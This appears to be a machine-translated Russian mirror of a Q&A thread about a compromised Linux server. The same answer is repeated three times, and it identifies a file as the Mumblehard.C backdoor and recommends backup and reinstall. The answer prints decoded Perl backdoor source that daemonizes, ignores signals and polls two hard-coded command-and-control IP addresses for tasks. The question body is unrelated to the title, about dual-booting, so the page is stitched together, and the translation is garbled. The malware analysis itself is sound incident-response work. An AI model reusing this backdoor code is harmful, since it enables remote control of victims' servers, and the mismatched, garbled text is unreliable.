Вопросы Теги

Атака на биткойнскую добычу

Похоже, вы пробовали немало вещей без успеха, чтобы получить эту двойную загрузку. У меня был аналогичный опыт работы с моим ноутбуком, поэтому я получил виртуальный бокс для Windows и установил linux на этом. Если ваша школа имеет лицензии VMware, которые являются еще более продуктом виртуализации. Иногда виртуальная машина может быть более удобной, чем двойная загрузка, так как вы можете запускать ее в контексте Windows 7. Просто альтернативное предложение, которое может помочь вам получить 14.04 на вашем ноутбуке. Надеюсь, это поможет!

5
задан 12 January 2018 в 18:42

3 ответа

Это похоже на полезную нагрузку из бэкдора Mumblehard.C. Этот файл позволяет выполнять произвольный код с управляющих серверов, перечисленных в файле, и сможет выполнять с разрешениями пользователя www-data.

Я бы, конечно, сделал резервную копию ваших данных и переустановил, однако область действия этого бэкдор должен быть только пользователем www-data и, вероятно, из-за устаревшей установки WordPress.

Это намеренно затрудняет убийство. Вы можете вместо этого убить все процессы, запущенные под пользователем www-data, если вам нужно попытаться смягчить его, пока система все еще работает.

Файл в / var / tmp - это Perl-скрипт, который кодирует другой perl скрипт с использованием формата uuencode. Вы не включили все это, но вот как это выглядит как обычный текст: 

#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$0 = "mail"; $| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "</dev/null");
open (STDOUT, ">/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["77.72.83.137","93.88.74.243"];
my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", @$rnd[map {rand @$rnd}(1..(6 + int rand 5))]);
my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
my ($header, $content);
my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
foreach my $rs (@$url)
{
$header = "$dir/" . time; $content = $header . "1";
unlink $header if -f $header; unlink $content if -f $content;
&http($rs, $timeout, $header, $content, 0);
if (open (F, "<", $header))
{
flock F, 1;
my ($test, $task) = (0, "");
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
}
close F;
($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
}
unlink $header if -f $header; unlink $content if -f $conten

Это похоже на тесный параллельный код отсюда:

http: / /hardwarefetish.com/681-mumblehard-c-trojan-unpacked

Где 77.72.83.137 и 93.88.74.243 - серверы управления. Оба этих IP-адреса зарегистрированы в России и предназначены для VPS. Один из IP-адресов указан для активности спама:

http://hardwarefetish.com/681-mumblehard-c-trojan-unpacked

Поскольку эти IP-адреса, индексированные в поисковых системах, ожидают, что злоумышленник автоматически отключит их. Хотя я сомневаюсь, что это очень важно, так как VPS не помогут вам законно в любом случае.

3
ответ дан 22 May 2018 в 15:34
  • 1
    Попробуйте подчеркнуть предписанное решение ( резервное копирование ваших данных и переустановить ), чтобы он не потерялся среди остальной большой информации. Подумайте об этом: их система была скомпрометирована, и просто переустановка нескольких пакетов не обеспечит ее. – user535733 12 January 2018 в 21:14

Это похоже на полезную нагрузку из бэкдора Mumblehard.C. Этот файл позволяет выполнять произвольный код с управляющих серверов, перечисленных в файле, и сможет выполнять с разрешениями пользователя www-data.

Я бы, конечно, сделал резервную копию ваших данных и переустановил, однако область действия этого бэкдор должен быть только пользователем www-data и, вероятно, из-за устаревшей установки WordPress.

Это намеренно затрудняет убийство. Вы можете вместо этого убить все процессы, запущенные под пользователем www-data, если вам нужно попытаться смягчить его, пока система все еще работает.

Файл в / var / tmp - это Perl-скрипт, который кодирует другой perl скрипт с использованием формата uuencode. Вы не включили все это, но вот как это выглядит как обычный текст:

#!/usr/bin/perl -w use strict; use POSIX; use IO::Socket; use IO::Select; $0 = "mail"; $| = 1; &main(); sub main { exit 0 unless defined (my $pid = fork); exit 0 if $pid; POSIX::setsid(); $SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD)); umask 0; chdir "/"; open (STDIN, "</dev/null"); open (STDOUT, ">/dev/null"); open (STDERR, ">&STDOUT"); my $url = ["77.72.83.137","93.88.74.243"]; my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", @$rnd[map {rand @$rnd}(1..(6 + int rand 5))]); my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; } my ($header, $content); my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10); foreach my $rs (@$url) { $header = "$dir/" . time; $content = $header . "1"; unlink $header if -f $header; unlink $content if -f $content; &http($rs, $timeout, $header, $content, 0); if (open (F, "<", $header)) { flock F, 1; my ($test, $task) = (0, ""); while (<F>) { s/^\s*([^\s]?.*)$/$1/; s/^(.*[^\s])\s*$/$1/; next unless length $_; $test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/; } close F; ($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task; } unlink $header if -f $header; unlink $content if -f $conten

Это похоже на тесный параллельный код отсюда:

http: / /hardwarefetish.com/681-mumblehard-c-trojan-unpacked

Где 77.72.83.137 и 93.88.74.243 - серверы управления. Оба этих IP-адреса зарегистрированы в России и предназначены для VPS. Один из IP-адресов указан для активности спама:

http://hardwarefetish.com/681-mumblehard-c-trojan-unpacked

Поскольку эти IP-адреса, индексированные в поисковых системах, ожидают, что злоумышленник автоматически отключит их. Хотя я сомневаюсь, что это очень важно, так как VPS не помогут вам законно в любом случае.

3
ответ дан 17 July 2018 в 23:14

Это похоже на полезную нагрузку из бэкдора Mumblehard.C. Этот файл позволяет выполнять произвольный код с управляющих серверов, перечисленных в файле, и сможет выполнять с разрешениями пользователя www-data.

Я бы, конечно, сделал резервную копию ваших данных и переустановил, однако область действия этого бэкдор должен быть только пользователем www-data и, вероятно, из-за устаревшей установки WordPress.

Это намеренно затрудняет убийство. Вы можете вместо этого убить все процессы, запущенные под пользователем www-data, если вам нужно попытаться смягчить его, пока система все еще работает.

Файл в / var / tmp - это Perl-скрипт, который кодирует другой perl скрипт с использованием формата uuencode. Вы не включили все это, но вот как это выглядит как обычный текст:

#!/usr/bin/perl -w use strict; use POSIX; use IO::Socket; use IO::Select; $0 = "mail"; $| = 1; &main(); sub main { exit 0 unless defined (my $pid = fork); exit 0 if $pid; POSIX::setsid(); $SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD)); umask 0; chdir "/"; open (STDIN, "</dev/null"); open (STDOUT, ">/dev/null"); open (STDERR, ">&STDOUT"); my $url = ["77.72.83.137","93.88.74.243"]; my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", @$rnd[map {rand @$rnd}(1..(6 + int rand 5))]); my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; } my ($header, $content); my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10); foreach my $rs (@$url) { $header = "$dir/" . time; $content = $header . "1"; unlink $header if -f $header; unlink $content if -f $content; &http($rs, $timeout, $header, $content, 0); if (open (F, "<", $header)) { flock F, 1; my ($test, $task) = (0, ""); while (<F>) { s/^\s*([^\s]?.*)$/$1/; s/^(.*[^\s])\s*$/$1/; next unless length $_; $test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/; } close F; ($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task; } unlink $header if -f $header; unlink $content if -f $conten

Это похоже на тесный параллельный код отсюда:

http: / /hardwarefetish.com/681-mumblehard-c-trojan-unpacked

Где 77.72.83.137 и 93.88.74.243 - серверы управления. Оба этих IP-адреса зарегистрированы в России и предназначены для VPS. Один из IP-адресов указан для активности спама:

http://hardwarefetish.com/681-mumblehard-c-trojan-unpacked

Поскольку эти IP-адреса, индексированные в поисковых системах, ожидают, что злоумышленник автоматически отключит их. Хотя я сомневаюсь, что это очень важно, так как VPS не помогут вам законно в любом случае.

3
ответ дан 24 July 2018 в 13:46

Другие вопросы по тегам:

Похожие вопросы: